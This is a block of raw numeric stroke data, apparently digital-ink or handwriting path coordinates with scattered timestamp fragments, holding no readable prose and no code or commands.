0,5 4 0,-4 0 0,-2 0 0,-5 9 0,1 3 0,4 5 0,1 4 0,0 1 0,3 14 0,-3 11 0,9 22 0,2-17 0,5 2 0,0-31 0,10 18 0,8-13 0,10 16 0,6-17 0,0-5 0,-5-5 0,3-5 0,-14-8 0,3-4 0,5 0 0,-12 0 0,27-4 0,-26-2 0,26-21 0,-27 12 0,8-6 0,-17 16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43:15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138 483 24575,'0'16'0,"0"-4"0,0 21 0,0-12 0,0 8 0,0-13 0,0-21 0,0-3 0,-17-56 0,7 24 0,-20-32 0,10 10 0,6 19 0,-2-19 0,4 19 0,4 11 0,-3 3 0,11 2 0,0 14 0,0-13 0,0 13 0,0-2 0,5 4 0,6 0 0,1 5 0,15-4 0,-14 4 0,14 0 0,-15 1 0,18 5 0,-20 0 0,9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43:16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24575,'0'4'0,"0"14"0,0 7 0,0 15 0,0 1 0,0 0 0,5 7 0,8 6 0,-5-5 0,3 7 0,0 17 0,2-18 0,7 13 0,2-5 0,-14-24 0,13 18 0,-18-22 0,12-1 0,-9-7 0,0-6 0,3-9 0,-3 2 0,0-3 0,8 6 0,-6-1 0,7 4 0,-9-12 0,-1 1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43:17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24575,'16'0'0,"18"0"0,0-11 0,14 3 0,6-16 0,-12 10 0,6-4 0,-2 0 0,-18 10 0,6-2 0,-22 10 0,-8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43:36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24575,'30'0'0,"11"-5"0,0 3 0,0-3 0,51-13 0,-39 7 0,42-14 0,-19 11 0,-37 7 0,52 1 0,-54 6 0,17 0 0,4 0 0,9 0 0,-13-1 0,0 2 0,22 10 0,-1 3 0,-6 0 0,-2-3 0,-13-11 0,14 0 0,-33 0 0,17 0 0,-34 0 0,8 0 0,-9 0 0,-6 0 0,-6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43:38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24575,'16'0'0,"18"0"0,-6 0 0,12 5 0,0 2 0,-7 5 0,9 0 0,3 15 0,-23-16 0,9 14 0,-14-19 0,-5 0 0,4-1 0,-5 0 0,-1-4 0,1 3 0,4 1 0,7 6 0,-4 1 0,2-1 0,-10-7 0,-4 1 0,4-4 0,-9 9 0,4 0 0,-10 7 0,-17 10 0,-9 2 0,-15 11 0,-11 12 0,18-14 0,-11 23 0,25-34 0,1 13 0,-8-7 0,17-8 0,-6 6 0,11-19 0,9 2 0,-4-8 0,5 0 0,0-1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44:56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 24575,'-12'23'0,"4"-3"0,-15 16 0,-2 6 0,5-8 0,-3 12 0,0-4 0,13-9 0,-12 7 0,16-16 0,-1 5 0,-8 13 0,12 2 0,-7 15 0,10-11 0,0 11 0,0-11 0,0 5 0,0 10 0,0-18 0,5 17 0,1-37 0,0 7 0,4-14 0,-8-1 0,8 15 0,-4-1 0,6 15 0,-6 7 0,-1-15 0,-5 18 0,0-28 0,0 12 0,0-17 0,0 15 0,0-6 0,0 6 0,0-11 0,0-5 0,0 20 0,0-10 0,0 22 0,6-13 0,0 16 0,1-8 0,3-3 0,-9-12 0,4 6 0,-5-3 0,0 43 0,0-27 0,0 10 0,0-29 0,0-6 0,0 7 0,0 0 0,0 14 0,0-23 0,0 9 0,0-23 0,0 3 0,0-4 0,0 0 0,-5-1 0,4 1 0,-4 0 0,1-5 0,2 3 0,-2-3 0,4 5 0,-5 0 0,4-1 0,-4 1 0,5 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-5 0,0-1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38:23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2312 1 16261,'-47'0'0,"4"0"3619,-20 0-3619,1 0 1431,-35 0-1431,26 0 0,-3 0 0,9 0 0,0 0 382,-17 0 0,1 0-382,16 0 0,1 0 1250,-9 0 0,-2 0-1250,1-1 0,-1 2 0,-5 0 0,1 4 0,10 5 0,-1 8 0,-21 17 0,2 8 0,26-6 0,3 4 0,-17 23 0,7 6 0,27-15 0,6 6 0,-1 14 0,0 11 0,5-7 0,5-10 0,4-1-554,2 3 1,0 4-1,4-8 554,4-13 0,4-5 0,0 39 0,-2-25 0,1 4 0,5 1 0,3 2 0,-2 22 0,0 4-206,2-24 1,1 1 0,0 1 205,1-1 0,2 0 0,-1 1 0,-1 4 0,0 1 0,3-1 0,4-1 0,2-1 0,0 2 0,1 6 0,-1 1 0,3-3 0,2-16 0,1-2 0,3 6 0,0 6 0,3 8 0,0 0 0,-1-8 0,0-8 0,0-7 0,0 4 535,4 20 1,1 4 0,0-7-536,5 9 0,-2-14 0,4-1 0,-10-23 0,0-4 0,4-17 670,1 1-670,-4-23 0,16-5 0,2-5 0,52-2 0,13-3 0,-44 1 0,4-1-363,5-2 1,11-1 0,3-2 0,-6 2 362,2-2 0,-3 0 0,5 0 0,8 0 0,8 1 0,0 0 0,-9 1 0,-10 1 0,-7 1 0,5 1 0,1 2 0,6 0 0,-2 2 0,-12 0 0,-2 0 0,-6 2 0,22-1 0,-1 0 0,-21 0 0,-6 0 0,21 0 0,-2-3 0,-4 0 0,-23 2 0,6-2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5T14:40:59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24575,'0'34'0,"0"-14"0,0 12 0,0-8 0,0 1 0,0 11 0,0 10 0,0-11 0,0 18 0,0 1 0,0-8 0,1 15 0,1 16 0,1-14 0,3-5 0,-4 15 0,2-8 0,1-49 0,-5 11 0,4-4 0,-2 0 0,2 2 0,-4-8 0,0 9 0,0-3 0,0 3 0,0-5 0,0-4 0,0-2 0,0-4 0,5-5 0,-4 3 0,4-3 0,-5 0 0,0-1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47:03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913 0 24575,'-18'0'0,"-10"0"0,-8 0 0,2 0 0,-13 0 0,12 0 0,-4 0 0,4 0 0,5 0 0,-7 0 0,-17 0 0,-6 0 0,-18 0 0,15 0 0,-4 0 0,18 10 0,-3 3 0,21 21 0,-8 2 0,14 24 0,-5 13 0,16-12 0,3 21 0,11-17 0,0-11 0,0 1 0,0 18 0,0-20 0,0-4 0,0-7 0,0 12 0,6 41 0,0-43 0,2 10 0,3 3 0,16 11 0,-5-10 0,1 2 0,-6-21 0,2 0 0,5 11 0,-2-4 0,-7-8 0,0-7 0,-9-18 0,-5 1 0,4 1 0,0 4 0,-4-11 0,4 4 0,-1-3 0,-2 0 0,7-2 0,-8-4 0,9 0 0,-9-1 0,9 1 0,-5-5 0,1 3 0,4-3 0,-4 0 0,5 4 0,-1-9 0,1 4 0,4-1 0,2-2 0,4 7 0,12-8 0,7 4 0,14 0 0,-1-3 0,12 8 0,-9-8 0,5 3 0,-8-5 0,-12 5 0,-7-3 0,-7 3 0,-6-5 0,0 0 0,1 0 0,-10 5 0,2 6 0,-12-4 0,3 4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47:25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24575,'50'0'0,"-17"0"0,24 0 0,7 0 0,12 0 0,-20 0 0,3 0 0,37 0 0,-20 0 0,12 0 0,8 0 0,-26 0 0,15 0 0,1 0 0,-31 0 0,-1 0 0,1 0 0,-3 0 0,1 0 0,0 0 0,0 0 0,19 0 0,-24 0 0,36 0 0,-1-5 0,-31-1 0,0-1 0,45-7 0,-4-11 0,-9 16 0,-17-6 0,0-1 0,25 6 0,-22-4 0,-1 2 0,8 4 0,-27 2 0,0 0 0,26 5 0,-23-2 0,2 0 0,-3 2 0,4 2 0,29-1 0,1 0 0,-20-1 0,0 2 0,29 4 0,0 2 0,-30 0 0,-2 2 0,0 1 0,-1 2 0,-2-2 0,-4-1 0,28-1 0,10-2 0,-26-6 0,14 0 0,8 0 0,-28 0 0,-1 0 0,2 0 0,20 0 0,-19-1 0,3 2 0,-9 1 0,0 2 0,5-1 0,1 2 0,-8 4 0,0 1 0,5 0 0,1 2 0,9 4 0,-1 0 0,-9-4 0,-2-2 0,-1 1 0,-4-3 0,24-2 0,-52-17 0,7-1 0,-17-1 0,15 2 0,35 11 0,-4-12 0,32 9 0,-38-9 0,37 0 0,9 0 0,-39 6 0,2 0 0,13-6 0,8-2 0,-4 1 0,8 0 0,-6 2 0,-8-1 0,0 1 0,13-1 0,-1 1 0,-18 3 0,-2 2 0,5 1 0,-1 1 0,-4 0 0,-2 2 0,-10 1 0,-2 2 0,2-1 0,-2 0 0,31 0 0,-22 0 0,-17 0 0,-6 0 0,-2 0 0,14 0 0,-11 0 0,-1 0 0,-1 0 0,-4 0 0,31 0 0,-3 0 0,21 0 0,-28 0 0,-3 5 0,15 8 0,-11 0 0,38 11 0,-33-11 0,5 5 0,-6-5 0,-7-6 0,-5-2 0,-14-5 0,29 6 0,-16-5 0,29 4 0,-16 0 0,0-4 0,0 10 0,0-4 0,26 16 0,-19-8 0,20 8 0,-27-17 0,10-1 0,-14-5 0,-4 0 0,-20 0 0,1 0 0,-9 0 0,7 0 0,-20 0 0,-2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47:34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24575,'24'0'0,"4"0"0,-4 0 0,4 0 0,0 0 0,3 0 0,-2 0 0,12 0 0,-5 0 0,1 0 0,-3 0 0,10 0 0,-4 0 0,18 0 0,-5 0 0,2 0 0,-1 0 0,-1 0 0,-7 0 0,1 0 0,6 0 0,11 0 0,-17 0 0,30 0 0,-16 0 0,7 0 0,-1 0 0,-20 0 0,4 0 0,-14 0 0,6 0 0,-8 0 0,5 0 0,-10 0 0,6 0 0,-22 0 0,17 0 0,-7 0 0,9 0 0,1 0 0,0 0 0,0 0 0,4 0 0,-13 0 0,9 0 0,-21 0 0,7 0 0,-9-5 0,0 4 0,-1-4 0,-4 5 0,-1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21:54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24575,'44'0'0,"-2"0"0,28 0 0,-9 0 0,19 0 0,-22 0 0,-3 0 0,-3 0 0,3 0 0,-1 0 0,-3 0 0,13 0 0,-3 0 0,25 0 0,-16 0 0,26 0 0,-39 0 0,-8 0 0,2 0 0,13 0 0,-3 0 0,6 0 0,8 0 0,1 0 0,-7 0 0,0 0 0,7 0 0,-2 0 0,-16 0 0,-4 0 0,31 0 0,6 0 0,-25 0 0,26 0 0,-52 0 0,27 0 0,-33 0 0,-4 0 0,4 0 0,-7 0 0,-6 0 0,1 0 0,-1 0 0,0 0 0,-9 0 0,-2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26:13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44 153 24575,'17'-12'0,"7"-10"0,41-12 0,-24 12 0,21-8 0,-14 23 0,-7-6 0,7 6 0,-1 1 0,3 6 0,13 0 0,4 0 0,-6 0 0,-17 6 0,-4 0 0,-13 15 0,-4-3 0,-1 8 0,-7-4 0,-9 4 0,-1 3 0,-5 17 0,-13 34 0,-8-20 0,-22 21 0,-9 3 0,15-39 0,-1-3 0,-13 22 0,-3 2 0,-4-6 0,4-7 0,-3-4 0,9-7 0,0-4 0,1-10 0,6-10 0,-4-1 0,15-11 0,-9 4 0,16-8 0,-4 8 0,10-9 0,2 4 0,13-5 0,4 0 0,13 0 0,13 0 0,3 0 0,18 0 0,-3 0 0,8 0 0,0 0 0,-1 0 0,4 0 0,-3 0 0,0 0 0,12 0 0,-2 0 0,26 0 0,-42 0 0,-2 0 0,-12 0 0,7 0 0,5 0 0,-8 0 0,9 0 0,-2 0 0,-21 0 0,12 0 0,-23 0 0,7 0 0,-14 0 0,-1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26:16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24575,'0'10'0,"0"1"0,0 10 0,0-2 0,0 3 0,0 0 0,0-4 0,0 4 0,0-4 0,0 2 0,0-3 0,0 5 0,0-5 0,0-1 0,0-1 0,0-3 0,0 18 0,0-16 0,0 11 0,0-5 0,0-7 0,5 8 0,1-11 0,5 1 0,-1-5 0,6 3 0,-4-3 0,8 0 0,-8-1 0,8 0 0,-3-4 0,-1 4 0,9-5 0,-12 0 0,7 0 0,-9 0 0,0 0 0,4 0 0,-3 0 0,4 0 0,-6 0 0,1 0 0,-5-5 0,3-1 0,-7-10 0,2-1 0,-4 1 0,0-5 0,0 9 0,0-4 0,0 6 0,0-1 0,-4 0 0,-2 0 0,-5 0 0,0 5 0,0-3 0,-9 7 0,6-2 0,-6 4 0,9 0 0,0 0 0,-4 0 0,3 0 0,-9 0 0,4 0 0,-4 0 0,4 0 0,1 0 0,10 4 0,-3 2 0,7 5 0,-2 0 0,-1-1 0,-1-4 0,0 4 0,1-4 0,5 5 0,0-6 0,0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26:18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24575,'0'3'0,"0"0"0,0 18 0,0-9 0,0 10 0,0-10 0,0 4 0,0-5 0,0-1 0,0 1 0,0 5 0,-5-5 0,-1 10 0,0-10 0,-4 5 0,9-5 0,-8-1 0,7 1 0,-2 0 0,4-1 0,0 1 0,-5-5 0,4 4 0,-9-4 0,9 4 0,-9-4 0,9 4 0,-9-9 0,9 8 0,1-7 0,11 2 0,1-4 0,3-5 0,1 4 0,7-9 0,-4 9 0,2-4 0,0 0 0,2-2 0,5-4 0,5 5 0,-10 1 0,4 5 0,-6 0 0,-4 0 0,-2 0 0,1 0 0,-5-4 0,10 2 0,-9-2 0,3-1 0,-9 4 0,-1-4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26:19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24575,'0'23'0,"0"6"0,0 24 0,0 5 0,0-1 0,0 1 0,0 1 0,0 1 0,0-19 0,0 7 0,0-27 0,0-11 0,0 1 0,0-5 0,0-1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26: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24575,'17'0'0,"21"10"0,-10-2 0,6 9 0,-6-6 0,-16 5 0,-2-4 0,0-2 0,-4-5 0,4-5 0,-4 5 0,4-4 0,-4 4 0,4-5 0,1 0 0,0 0 0,0 0 0,-1 0 0,-4 0 0,-1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26:40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0 24185,'0'11'0,"0"0"194,-5-5-194,4 3 65,-9-3-65,9 5 33,-4 0-33,0-5 98,4 3-98,-4-3 0,5 9 0,0 3 0,-5-1 0,-1-1 0,-5-5 0,5 4 0,-9-3 0,13 4 0,-14-5 0,15 0 0,-13 4 0,-3 7 0,-1-5 0,-3 4 0,11-15 0,-1 8 0,0-7 0,5 8 0,-4-9 0,9 4 0,-8-9 0,7 8 0,-2-7 0,4 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5T14:41:01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1 546 24575,'10'0'0,"1"0"0,0 0 0,10 0 0,-8 0 0,8 0 0,-5 0 0,2 0 0,15 10 0,-13-7 0,11 12 0,-19 2 0,5-4 0,-6 8 0,-5-10 0,-2 0 0,1-1 0,1-4 0,5-1 0,0-5 0,4 0 0,-3 0 0,3 0 0,-4 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 5 0,-1-4 0,1 8 0,-5-3 0,3 0 0,-3 4 0,5-9 0,0 9 0,-1-9 0,-4 8 0,4-8 0,-9 9 0,9-9 0,-9 9 0,8-9 0,-3 4 0,5-5 0,-5-5 0,3-1 0,3-21 0,0-10 0,5-7 0,6-48 0,-8 39 0,13-34 0,-16 46 0,5 6 0,-6 7 0,-4 5 0,3 5 0,1-14 0,1 7 0,10-21 0,-5 11 0,-4 0 0,12-3 0,-17 18 0,8-1 0,-11 16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26:42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56 24575,'62'0'0,"-19"0"0,26-6 0,-4-8 0,-14 4 0,20-8 0,-15 16 0,-3-4 0,-10 6 0,-11 0 0,-24 5 0,2 17 0,-10 12 0,-5-3 0,-13 27 0,-21-2 0,-8 21 0,15-37 0,0-1 0,-27 36 0,-5-10 0,-1 5 0,-5-5 0,22-13 0,-17 3 0,36-17 0,-16 3 0,25-15 0,-7 5 0,10-8 0,5 1 0,24-9 0,10-10 0,20-5 0,3 0 0,33 0 0,-16 0 0,32 0 0,-13 0 0,-2 0 0,1 0 0,8 0 0,-3 0 0,-25 0 0,10-5 0,-21-2 0,-1-4 0,-22 0 0,5 5 0,-20 1 0,-6 5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26:44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24575,'0'17'0,"0"0"0,0-7 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 4 0,0-3 0,0 4 0,-10 4 0,7-7 0,-12 8 0,9-6 0,-5-3 0,5 4 0,-3-6 0,3 1 0,0 0 0,-4 0 0,9-1 0,-9 1 0,9 0 0,-4-1 0,5 1 0,-5 0 0,9-5 0,-3-2 0,14-4 0,-3-4 0,4 2 0,-1-2 0,-3 4 0,8 0 0,-8 0 0,8-5 0,-8 4 0,4-4 0,-6 5 0,1-5 0,0 4 0,0-4 0,-6 0 0,5 4 0,-4-4 0,0 0 0,-1-1 0,-5 0 0,0 1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26:45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24575,'0'21'0,"0"8"0,0 2 0,0 9 0,0-15 0,0 4 0,0 11 0,0 9 0,0-9 0,0 18 0,0-22 0,0 7 0,0-11 0,0-5 0,0-4 0,0 6 0,0-2 0,0-15 0,0-3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26:46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24575,'23'0'0,"6"0"0,10 0 0,-4 0 0,-6 0 0,10 0 0,-18 0 0,10 0 0,-20 0 0,0 0 0,-5 0 0,-2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26:47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24575,'10'0'0,"7"0"0,10 0 0,-6 0 0,11 0 0,-6 0 0,-6 0 0,0 0 0,-15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26:49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28 143 24575,'17'-18'0,"26"-16"0,-14 17 0,19-12 0,-20 18 0,-4-1 0,-1 6 0,-2-4 0,1 9 0,2-4 0,-2 5 0,-6 0 0,-5 0 0,0 30 0,-5-7 0,-2 21 0,-4-16 0,0 2 0,0-6 0,0 23 0,-20 10 0,-4 3 0,7 9 0,-11-5 0,-2-7 0,12-26 0,-13 22 0,-4-14 0,-8 21 0,2-14 0,6-11 0,8-2 0,10-17 0,6 0 0,21-10 0,11-1 0,15-5 0,33 0 0,-17 0 0,26 0 0,0 0 0,-9 0 0,14-6 0,-27-1 0,-16 0 0,-23 2 0,-7 5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26:50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24575,'0'17'0,"0"11"0,0-3 0,0 9 0,0 6 0,0-7 0,0 9 0,0-12 0,0-7 0,0 15 0,0-17 0,0 16 0,0-20 0,0 6 0,0-6 0,0 15 0,0-7 0,0 10 0,0-7 0,0-11 0,0 10 0,0-14 0,0 8 0,0-5 0,4-9 0,2 2 0,5-9 0,4 0 0,-3 0 0,18 0 0,-5 0 0,7-5 0,0-6 0,-4-11 0,-9 4 0,-5-12 0,-14 17 0,0-8 0,0 10 0,0 1 0,0-1 0,0-5 0,-5 4 0,-6-3 0,-1 4 0,-8 5 0,8 1 0,-9 5 0,9 0 0,-13 0 0,12 0 0,-13 0 0,10 9 0,-6 3 0,0 10 0,6-6 0,-5 0 0,9-6 0,-4 1 0,10 0 0,2 0 0,4-6 0,0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26:53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109 167 24575,'-11'0'0,"0"0"0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,5-5 0,-3 14 0,8-7 0,-4 13 0,5-4 0,0 0 0,0-1 0,0 1 0,0 0 0,4-1 0,2-4 0,10 4 0,-4-4 0,3 5 0,1-5 0,2 3 0,10 3 0,7 0 0,0 10 0,-6-10 0,2 13 0,-18-12 0,12 12 0,-9-8 0,-4 0 0,-2-2 0,-10-4 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-5-1 0,-12 6 0,-1-4 0,-15 4 0,-1-4 0,-1-1 0,-15 0 0,19-5 0,-1-1 0,22-15 0,5 3 0,5-14 0,0 9 0,0-3 0,0-7 0,5 9 0,-4-14 0,8 15 0,-3-4 0,10-10 0,-4 1 0,4-14 0,-5-5 0,0 13 0,-5-11 0,-1 19 0,-5-5 0,0 2 0,0-18 0,0 17 0,0-9 0,0 20 0,0 4 0,0-3 0,0 4 0,0 0 0,0 0 0,0 0 0,0 1 0,0 4 0,0 1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27:04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24575,'30'0'0,"16"0"0,20-6 0,0-8 0,21-2 0,3-4 0,-18 12 0,5 1 0,-23 7 0,-19 0 0,18 0 0,-29 0 0,0 0 0,-8 11 0,0 68 0,-8-25 0,-2-5 0,-1 2 0,-5 18 0,0-26 0,-6 26 0,-2-22 0,-23 47 0,-5-11 0,7-21 0,-2-1 0,-12 11 0,0-10 0,1-3 0,7-15 0,4-3 0,-2-1 0,-1-12 0,14-4 0,-13 0 0,16-3 0,-1-9 0,3-1 0,19-7 0,27-4 0,12 0 0,20 0 0,-13-2 0,2-2 0,22 3 0,-23-2 0,1 0 0,27-3 0,-12 5 0,10-10 0,-22 9 0,-15-3 0,-18 5 0,-2 0 0,-12 0 0,1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27:06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 24575,'16'0'0,"-3"0"0,12 0 0,-16 4 0,5 2 0,-14 10 0,0 1 0,-5-1 0,-1 0 0,-25 20 0,15-19 0,-15 19 0,20-21 0,0-3 0,5 4 0,-4-1 0,9-3 0,-4 3 0,1-9 0,2 4 0,-2-4 0,4 4 0,0 1 0,0 0 0,-5-1 0,4 6 0,-4-4 0,20-1 0,-7-7 0,19-4 0,1 0 0,-2 0 0,2 0 0,-7 0 0,11 0 0,-11 0 0,10 0 0,-20 0 0,-1 0 0,1 0 0,0 0 0,-1-5 0,1-1 0,-5 0 0,-1 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5T14:41:04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0 643 24575,'64'-7'0,"9"-9"0,-1-2 0,15-6 0,0 2-2804,-9 2 1,-1 1 0,6 0 2803,1-1 0,7-1 0,2 0 0,-1 2-692,-5 2 0,1 2 0,-1 1 1,1 3 691,-2 2 0,-1 2 0,4 2 0,11 0 0,-15 1 0,11 1 0,6-1 0,4 1 0,1 1 0,-2-1 0,-4 2 0,-8-1-288,-2 1 1,-7 1-1,-3 0 1,0 1-1,3-1 1,7 0 287,-9 0 0,5 0 0,5 0 0,1 0 0,1 0 0,0 0 0,-4 0 0,-3 0 0,-6 0 0,22 0 0,-6 0 0,-4 0 0,-2 0 0,3 0-473,1 1 0,1 1 1,0 1-1,-2-1 0,-2-1 473,10 0 0,-3-1 0,-1 0 0,1 1 284,-16 1 1,2 0-1,-1 1 1,-3-2 0,-6 0-285,13-2 0,-6-1 0,-4-2 0,-8 1 0,-2-1 0,0-3 0,6-5 0,0-2 0,-11-2 0,15-16 0,-5 3 0,-2 1 0,-18 5 2571,18-7-2571,-7 1 2280,-14 12 1,2 0-2281,3 0 0,0 1 0,-1 2 0,2 3 0,21 6 0,-4 4 0,-1 1 0,6 5 0,-3 2 0,-22 1 6242,17 5-6242,-30-2 469,-15-10-469,1 4 0,-15-5 0,-1 0 0,-4 5 0,-1 1 0,-5 0 0,0-1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27:09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 24575,'-10'0'0,"-1"0"0,-15 0 0,12 0 0,-17 0 0,19 0 0,-4 0 0,5 0 0,0 0 0,0 0 0,-5 0 0,8 4 0,-7-3 0,9 9 0,0-4 0,-3 0 0,3 3 0,-5-3 0,5 10 0,1-4 0,5 3 0,0-4 0,0-1 0,5 1 0,43 16 0,-21-12 0,34 13 0,-28-12 0,-7-3 0,2 4 0,-7-6 0,-4-5 0,-5 3 0,2-8 0,-8 9 0,5-4 0,-5 5 0,-2-1 0,-4 1 0,0 0 0,0-1 0,-4 1 0,-7 5 0,-1-9 0,-4 7 0,0-8 0,4 0 0,-3 3 0,4-8 0,-5 4 0,4-5 0,-3 0 0,4 0 0,10-5 0,-3-1 0,13-4 0,-7-1 0,7 0 0,-3-5 0,10-6 0,-8-3 0,6-1 0,-8 3 0,0 2 0,-2 4 0,-4 1 0,0 5 0,0 1 0,5-6 0,-4 4 0,4-4 0,-5 5 0,0 1 0,0-1 0,0 0 0,0 0 0,5 5 0,-4 1 0,4 5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27:11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27:28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24575,'0'22'0,"0"11"0,0 7 0,0 12 0,0 21 0,0-26 0,0 8 0,0-1 0,0-13 0,0 35 0,0-23 0,0 5 0,0-1 0,5 18 0,-3-33 0,3 23 0,0-34 0,-4 1 0,3-22 0,-4-5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27:29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24575,'0'45'0,"0"-21"0,0 34 0,0-17 0,0 16 0,0-1 0,0-2 0,0-3 0,0-14 0,0 25 0,0-29 0,0 38 0,0-31 0,0 23 0,0-28 0,0-2 0,0-16 0,5-7 0,-4 0 0,3-9 0,-4 4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27:30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1 519 24575,'37'-11'0,"18"-14"0,-5-4 0,14-9 0,0 6 0,11-9 0,1-1 0,-9 7 0,-20 9 0,-1 0 0,18-5 0,-19 8 0,-1-1 0,6-7 0,6 6 0,-11 2 0,6 0 0,-11 11 0,-18-3 0,-11 14 0,-7-4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27:31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24575,'0'23'0,"0"24"0,0 6 0,0 9 0,0-21 0,0 10 0,0-23 0,0 21 0,0-15 0,0-9 0,0 12 0,0-24 0,0 8 0,0 0 0,0-8 0,0 7 0,0-9 0,0-1 0,0 6 0,0-4 0,0 3 0,0 0 0,0-3 0,0 4 0,0 5 0,5-8 0,-4 8 0,9-1 0,-9-11 0,4 5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27:3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1 175 24575,'11'0'0,"42"-26"0,-19 13 0,38-30 0,-23 12 0,-5 10 0,-8-6 0,-13 26 0,23-9 0,-22 8 0,19 1 0,-33 7 0,-10 5 0,0 0 0,0-1 0,0 6 0,0-4 0,0 9 0,0 1 0,0-3 0,-5 7 0,-7 2 0,-17 8 0,8 7 0,-17 2 0,19-12 0,-5 6 0,-20 24 0,16-20 0,-13 24 0,15-39 0,14-6 0,6-11 0,17-6 0,8-5 0,15-6 0,21-13 0,20-3 0,-5-10 0,6 11 0,-13-3 0,-2 10 0,7 1 0,-26 8 0,-15 5 0,-6 0 0,-14 9 0,2-1 0,-9 7 0,0 6 0,0-2 0,0 9 0,-16 12 0,-4 4 0,-21 10 0,-8 0 0,-16-2 0,20-24 0,0-1 0,-23 11 0,-1-4 0,-5-11 0,40-14 0,-33 7 0,39-16 0,4 0 0,1 0 0,8 4 0,9 2 0,1 0 0,5-1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27:34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24575,'24'0'0,"3"0"0,-5 0 0,-3 0 0,7 0 0,-14 0 0,5 0 0,-7 0 0,1 0 0,0 0 0,-1 0 0,7 0 0,-5 0 0,4 0 0,-10 0 0,-1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27:35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24575,'23'0'0,"1"0"0,15 0 0,-1 0 0,5 0 0,-15 0 0,0 0 0,-14 0 0,8 0 0,-11 0 0,-5 0 0,-1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27:37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0 335 24575,'11'-23'0,"2"4"0,30-35 0,3 7 0,7-7 0,-4 12 0,-1 7 0,-3 13 0,12-6 0,-18 22 0,-7 1 0,-15 5 0,-2 0 0,-8 5 0,8 6 0,-14 1 0,4 27 0,-5 6 0,0 33 0,-1-29 0,-3 3 0,-7 0 0,-4 1 0,-1 6 0,-3-1 0,-4-7 0,-2-2 0,-6 4 0,1-4 0,-6 20 0,-21-1 0,31-36 0,-3 2 0,-8-1 0,15-8 0,-16 8 0,21-12 0,28-14 0,6-4 0,26-15 0,11-12 0,-5 8 0,7-7 0,13-2 0,-1 4 0,10-10 0,-10 7 0,-27 6 0,-13 6 0,-17 7 0,-7 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5T14:41:07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721 1 24575,'-17'0'0,"-29"0"0,22 0 0,-30 0 0,6 0 0,6 0 0,-12 5 0,12 7 0,3 2 0,4 8 0,11-9 0,2 8 0,9-3 0,-14 10 0,7 2 0,2 0 0,8 8 0,10 4 0,5 5 0,30 7 0,20 2 0,22-9 0,-31-21 0,-1-1 0,32 13 0,-7-1 0,-21-11 0,-11 1 0,-4 5 0,-10-7 0,-3 12 0,-16-16 0,-5 1 0,0-1 0,0 0 0,-21-4 0,-28-6 0,-16-6 0,-12-5 0,-20-6 0,25-12 0,-21-8 0,26-11 0,17 7 0,10 2 0,13 6 0,5 5 0,5 6 0,6 2 0,2 8 0,3-4 0,-5 0 0,0 4 0,0-9 0,5 9 0,1-4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27:38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24575,'0'34'0,"0"-1"0,0 3 0,0 0 0,0 14 0,0-14 0,0 7 0,0-22 0,0-4 0,5-5 0,1-1 0,4-11 0,6-5 0,1-1 0,6-6 0,17-10 0,-3-3 0,26-16 0,-30 16 0,3 3 0,-25 12 0,-5 9 0,-1-4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27:39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24575,'0'42'0,"0"-7"0,0 18 0,0-24 0,0 24 0,0-18 0,0 4 0,0 1 0,0-15 0,0-4 0,0-11 0,0 1 0,0 14 0,0-11 0,0 26 0,5-25 0,-4 15 0,4-18 0,-5 4 0,0-10 0,0-2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27:41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25 246 24575,'0'23'0,"0"0"0,0 21 0,0-5 0,0 12 0,0-16 0,0-13 0,0-1 0,0-9 0,0 3 0,0-4 0,0 0 0,5-5 0,1-2 0,14-4 0,-7 0 0,8 0 0,-6 0 0,12-15 0,-8 1 0,7-9 0,-15-5 0,1 9 0,5-28 0,2 3 0,5-17 0,0 0 0,-11 16 0,-2 5 0,-11 18 0,0-11 0,0 14 0,0-12 0,0 19 0,0-9 0,-10 9 0,-17 1 0,7 7 0,-26 4 0,26 0 0,-7 0 0,11 0 0,1 9 0,3 3 0,-9 9 0,9 1 0,-8-1 0,3 20 0,4-9 0,-1 11 0,12-21 0,-2 3 0,4-12 0,0 7 0,-5 5 0,4-10 0,-4 10 0,5-15 0,0 1 0,0 0 0,0-1 0,0-4 0,0-1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27:42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24575,'0'45'0,"0"5"0,0 9 0,0 4 0,0-11 0,0-1 0,0 17 0,0 0 0,0-7 0,0-5 0,0 15 0,0 13 0,0-37 0,0-7 0,0-4 0,0-23 0,0-4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27:44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24575,'0'-11'0,"15"-10"0,6 12 0,15-18 0,6 14 0,-10-1 0,1-7 0,-10 19 0,-6-8 0,-2 10 0,-9 4 0,-1 2 0,0 5 0,1 4 0,0-3 0,-1 4 0,-5-6 0,0 1 0,0 5 0,0 0 0,0 17 0,-11 35 0,2-17 0,-13 18 0,-3-16 0,5-24 0,-24 54 0,21-40 0,-10 19 0,21-29 0,12-32 0,12-4 0,23-32 0,9 4 0,6-6 0,-8 13 0,-2 1 0,-4 10 0,5-4 0,4 5 0,-5 6 0,1 1 0,-12 5 0,-8 0 0,-10 0 0,5 0 0,-5 0 0,5 0 0,-5 24 0,0-1 0,-5 40 0,5-4 0,-9 24 0,3 1 0,-5-22 0,0-3 0,-5-23 0,-6-5 0,-7-3 0,-9-7 0,-13-4 0,14-4 0,-22-3 0,17-10 0,-15 0 0,-11 0 0,18 0 0,-20 0 0,37 0 0,-20 0 0,29 0 0,-8 0 0,4 0 0,5 0 0,-4 0 0,0 0 0,9 0 0,-3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28:16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 24575,'33'0'0,"-11"0"0,18 0 0,-7 0 0,4 0 0,50 0 0,-40 0 0,22 0 0,-38 0 0,-11 0 0,7 0 0,5 0 0,-5 0 0,8 0 0,11-5 0,5-2 0,11-5 0,5 5 0,-6-4 0,0 4 0,4 0 0,-20 2 0,-1 0 0,-11 3 0,3-3 0,5 5 0,4-5 0,5 4 0,-12-9 0,-1 8 0,-21-2 0,-6-1 0,1 4 0,0-4 0,-1 5 0,1 0 0,0 0 0,-5-5 0,-1 4 0,-5-4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28:48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 24575,'25'0'0,"-2"0"0,10 0 0,-11 0 0,18 0 0,-11 0 0,-9 0 0,25 0 0,-7 0 0,16 0 0,-1 0 0,-10 0 0,-8 0 0,1 0 0,-1 0 0,-3 0 0,2 0 0,16 0 0,7 0 0,10 0 0,-4 0 0,-16 0 0,-1-5 0,-10 4 0,18-15 0,-10 8 0,8-9 0,-2 0 0,-15 4 0,4-4 0,-10 11 0,-2-4 0,-6 4 0,-4 0 0,-2 1 0,-4 0 0,9-1 0,-7 0 